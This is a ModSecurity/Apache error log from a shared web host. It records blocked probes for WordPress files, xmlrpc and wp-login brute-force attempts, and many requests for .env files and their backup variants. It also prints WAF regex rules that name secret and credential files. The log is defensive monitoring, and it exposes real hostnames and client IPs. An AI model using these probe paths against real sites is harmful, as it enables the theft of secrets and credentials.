[Tue May 26 16:45:49.400171 2026] [security2:error] [pid 823496:tid 823680] [client 34.30.27.152:57297] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5Za08mrtyBNpA4PSUQAAADQ"]
[Tue May 26 16:45:49.653056 2026] [security2:error] [pid 823496:tid 823746] [client 34.30.27.152:51612] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5Za08mrtyBNpA4PSVwAAAHY"]
[Tue May 26 16:45:49.731074 2026] [security2:error] [pid 817651:tid 817675] [remote 216.73.216.30:20373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWA5dlGRCPPN1dS2y20ogAAjBc"]
[Tue May 26 16:45:49.799202 2026] [security2:error] [pid 823496:tid 823664] [client 34.30.27.152:54073] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5Za08mrtyBNpA4PSWwAAACQ"]
[Tue May 26 16:45:49.911403 2026] [security2:error] [pid 823496:tid 823717] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA5Ja08mrtyBNpA4PSRQAAAFk"]
[Tue May 26 16:45:51.154468 2026] [security2:error] [pid 823496:tid 823740] [client 52.167.144.214:41461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "osmsi.org.in"] [uri "/osmsi-india.php"] [unique_id "ahWA55a08mrtyBNpA4PSbgAAAHA"]
[Tue May 26 16:45:52.120766 2026] [security2:error] [pid 817651:tid 817875] [client 43.173.180.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWA6NlGRCPPN1dS2y20sAAAAOM"]
[Tue May 26 16:45:52.198888 2026] [security2:error] [pid 823496:tid 823685] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA5pa08mrtyBNpA4PSbAAAADk"]
[Tue May 26 16:45:52.458218 2026] [security2:error] [pid 817651:tid 817896] [client 117.198.37.168:61674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA6NlGRCPPN1dS2y20sQAAAPg"]
[Tue May 26 16:45:52.458396 2026] [security2:error] [pid 817651:tid 817896] [client 117.198.37.168:61674] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA6NlGRCPPN1dS2y20sQAAAPg"]
[Tue May 26 16:45:54.062290 2026] [proxy:error] [pid 823496:tid 823635] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:45:54.062388 2026] [proxy_http:error] [pid 823496:tid 823635] [client 205.210.31.20:65520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:45:54.063046 2026] [proxy:error] [pid 823496:tid 823635] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:45:54.063086 2026] [proxy_http:error] [pid 823496:tid 823635] [client 205.210.31.20:65520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:45:54.387786 2026] [security2:error] [pid 817651:tid 817806] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA6dlGRCPPN1dS2y20vQAAAJ4"]
[Tue May 26 16:45:56.392912 2026] [security2:error] [pid 817651:tid 817866] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA69lGRCPPN1dS2y20yQAAANo"]
[Tue May 26 16:45:56.756129 2026] [security2:error] [pid 823496:tid 823645] [client 104.28.119.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWA7Ja08mrtyBNpA4PStAAAABE"]
[Tue May 26 16:45:58.783561 2026] [security2:error] [pid 817651:tid 817820] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA7dlGRCPPN1dS2y205AAAAKw"]
[Tue May 26 16:45:59.429917 2026] [security2:error] [pid 817651:tid 817694] [remote 216.73.216.30:20373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWA79lGRCPPN1dS2y20-gAA0So"]
[Tue May 26 16:46:00.306954 2026] [security2:error] [pid 817651:tid 817890] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA7tlGRCPPN1dS2y209gAAAPI"]
[Tue May 26 16:46:02.915868 2026] [security2:error] [pid 823496:tid 823719] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA8Za08mrtyBNpA4PS5gAAAFs"]
[Tue May 26 16:46:03.109789 2026] [security2:error] [pid 817651:tid 817848] [client 117.198.37.168:61993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA89lGRCPPN1dS2y21JAAAAMg"]
[Tue May 26 16:46:03.109900 2026] [security2:error] [pid 817651:tid 817848] [client 117.198.37.168:61993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA89lGRCPPN1dS2y21JAAAAMg"]
[Tue May 26 16:46:04.526405 2026] [security2:error] [pid 823496:tid 823640] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA85a08mrtyBNpA4PS-gAAAAw"]
[Tue May 26 16:46:05.639949 2026] [security2:error] [pid 823496:tid 823509] [remote 167.172.25.98:50932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWA9Za08mrtyBNpA4PTDwAAego"]
[Tue May 26 16:46:06.306011 2026] [security2:error] [pid 817651:tid 817850] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA9dlGRCPPN1dS2y21PAAAAMo"]
[Tue May 26 16:46:08.002041 2026] [security2:error] [pid 823496:tid 823603] [remote 74.7.241.58:50434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWA95a08mrtyBNpA4PTKQAAMGg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:46:08.153194 2026] [security2:error] [pid 817651:tid 817818] [client 14.187.25.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA99lGRCPPN1dS2y21UQAAAKo"]
[Tue May 26 16:46:08.555317 2026] [security2:error] [pid 823496:tid 823719] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA95a08mrtyBNpA4PTJQAAAFs"]
[Tue May 26 16:46:09.442811 2026] [security2:error] [pid 817651:tid 817713] [remote 216.73.216.30:55721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWA-dlGRCPPN1dS2y21ZAAAzD0"]
[Tue May 26 16:46:10.428922 2026] [security2:error] [pid 823496:tid 823691] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA-Za08mrtyBNpA4PTRQAAAD8"]
[Tue May 26 16:46:12.700123 2026] [security2:error] [pid 817651:tid 817846] [client 62.60.130.233:63988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aarini.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWA_NlGRCPPN1dS2y21egAAAMY"], referer: https://duckduckgo.com/
[Tue May 26 16:46:12.708735 2026] [security2:error] [pid 823496:tid 823639] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA-5a08mrtyBNpA4PTZQAAAAs"]
[Tue May 26 16:46:13.055721 2026] [security2:error] [pid 823496:tid 823658] [client 62.60.130.233:57510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aarini.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWA_Za08mrtyBNpA4PTrAAAAB4"]
[Tue May 26 16:46:13.510895 2026] [security2:error] [pid 817651:tid 817866] [client 117.198.37.168:62315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA_dlGRCPPN1dS2y21fgAAANo"]
[Tue May 26 16:46:13.511029 2026] [security2:error] [pid 817651:tid 817866] [client 117.198.37.168:62315] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA_dlGRCPPN1dS2y21fgAAANo"]
[Tue May 26 16:46:14.206863 2026] [security2:error] [pid 823496:tid 823637] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA_Ja08mrtyBNpA4PTnAAAAAk"]
[Tue May 26 16:46:14.443917 2026] [security2:error] [pid 817651:tid 817739] [remote 216.73.216.30:55721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWA_tlGRCPPN1dS2y21hAAAwVc"]
[Tue May 26 16:46:15.732727 2026] [security2:error] [pid 817651:tid 817875] [client 208.84.101.17:60308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/api/.env"] [unique_id "ahWA_9lGRCPPN1dS2y21kQAAAOM"]
[Tue May 26 16:46:15.733165 2026] [security2:error] [pid 823496:tid 823699] [client 208.84.101.17:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/app/.env"] [unique_id "ahWA_5a08mrtyBNpA4PT5wAAAEc"]
[Tue May 26 16:46:15.733434 2026] [security2:error] [pid 823496:tid 823743] [client 208.84.101.17:60316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/backend/.env"] [unique_id "ahWA_5a08mrtyBNpA4PT5AAAAHM"]
[Tue May 26 16:46:15.737763 2026] [security2:error] [pid 823496:tid 823638] [client 208.84.101.17:60278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWA_5a08mrtyBNpA4PT7QAAAAo"]
[Tue May 26 16:46:17.526711 2026] [security2:error] [pid 823496:tid 823711] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA_5a08mrtyBNpA4PT0gAAAFM"]
[Tue May 26 16:46:17.915430 2026] [security2:error] [pid 823496:tid 823700] [client 176.65.139.239:47990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "tea.canopykaapi.com"] [uri "/.env"] [unique_id "ahWBAZa08mrtyBNpA4PUCwAAAEg"]
[Tue May 26 16:46:18.526143 2026] [security2:error] [pid 823496:tid 823655] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBAZa08mrtyBNpA4PUBAAAABs"]
[Tue May 26 16:46:19.015452 2026] [security2:error] [pid 823496:tid 823709] [client 208.84.101.17:60286] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.production.copy"] [unique_id "ahWBA5a08mrtyBNpA4PUHgAAAFE"]
[Tue May 26 16:46:19.727931 2026] [security2:error] [pid 817651:tid 817785] [client 208.84.101.17:60682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.production.bak"] [unique_id "ahWBA9lGRCPPN1dS2y21oQAAAIk"]
[Tue May 26 16:46:19.727946 2026] [security2:error] [pid 817651:tid 817863] [client 208.84.101.17:60688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.production.old"] [unique_id "ahWBA9lGRCPPN1dS2y21oAAAANc"]
[Tue May 26 16:46:19.728070 2026] [security2:error] [pid 817651:tid 817801] [client 208.84.101.17:60722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.production~"] [unique_id "ahWBA9lGRCPPN1dS2y21ogAAAJk"]
[Tue May 26 16:46:19.728161 2026] [security2:error] [pid 823496:tid 823713] [client 208.84.101.17:60696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.production.backup"] [unique_id "ahWBA5a08mrtyBNpA4PUMAAAAFU"]
[Tue May 26 16:46:19.728719 2026] [security2:error] [pid 823496:tid 823686] [client 208.84.101.17:60724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.production.swp"] [unique_id "ahWBA5a08mrtyBNpA4PULwAAADo"]
[Tue May 26 16:46:19.730295 2026] [security2:error] [pid 823496:tid 823727] [client 208.84.101.17:60596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.swp"] [unique_id "ahWBA5a08mrtyBNpA4PUMgAAAGM"]
[Tue May 26 16:46:19.730306 2026] [security2:error] [pid 823496:tid 823730] [client 208.84.101.17:60734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.production.orig"] [unique_id "ahWBA5a08mrtyBNpA4PULQAAAGY"]
[Tue May 26 16:46:19.731230 2026] [security2:error] [pid 823496:tid 823637] [client 208.84.101.17:60566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.backup"] [unique_id "ahWBA5a08mrtyBNpA4PUNQAAAAk"]
[Tue May 26 16:46:19.731256 2026] [security2:error] [pid 823496:tid 823715] [client 208.84.101.17:60546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.old"] [unique_id "ahWBA5a08mrtyBNpA4PUNgAAAFc"]
[Tue May 26 16:46:19.731374 2026] [security2:error] [pid 823496:tid 823629] [client 208.84.101.17:60668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.local.swp"] [unique_id "ahWBA5a08mrtyBNpA4PUNwAAAAE"]
[Tue May 26 16:46:19.732198 2026] [security2:error] [pid 823496:tid 823680] [client 208.84.101.17:60666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.local~"] [unique_id "ahWBA5a08mrtyBNpA4PULgAAADQ"]
[Tue May 26 16:46:19.732441 2026] [security2:error] [pid 823496:tid 823641] [client 208.84.101.17:60642] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.local.backup"] [unique_id "ahWBA5a08mrtyBNpA4PUOgAAAA0"]
[Tue May 26 16:46:19.732466 2026] [security2:error] [pid 823496:tid 823640] [client 208.84.101.17:60590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env~"] [unique_id "ahWBA5a08mrtyBNpA4PUPgAAAAw"]
[Tue May 26 16:46:19.732514 2026] [security2:error] [pid 823496:tid 823732] [client 208.84.101.17:60676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.local.copy"] [unique_id "ahWBA5a08mrtyBNpA4PUMwAAAGg"]
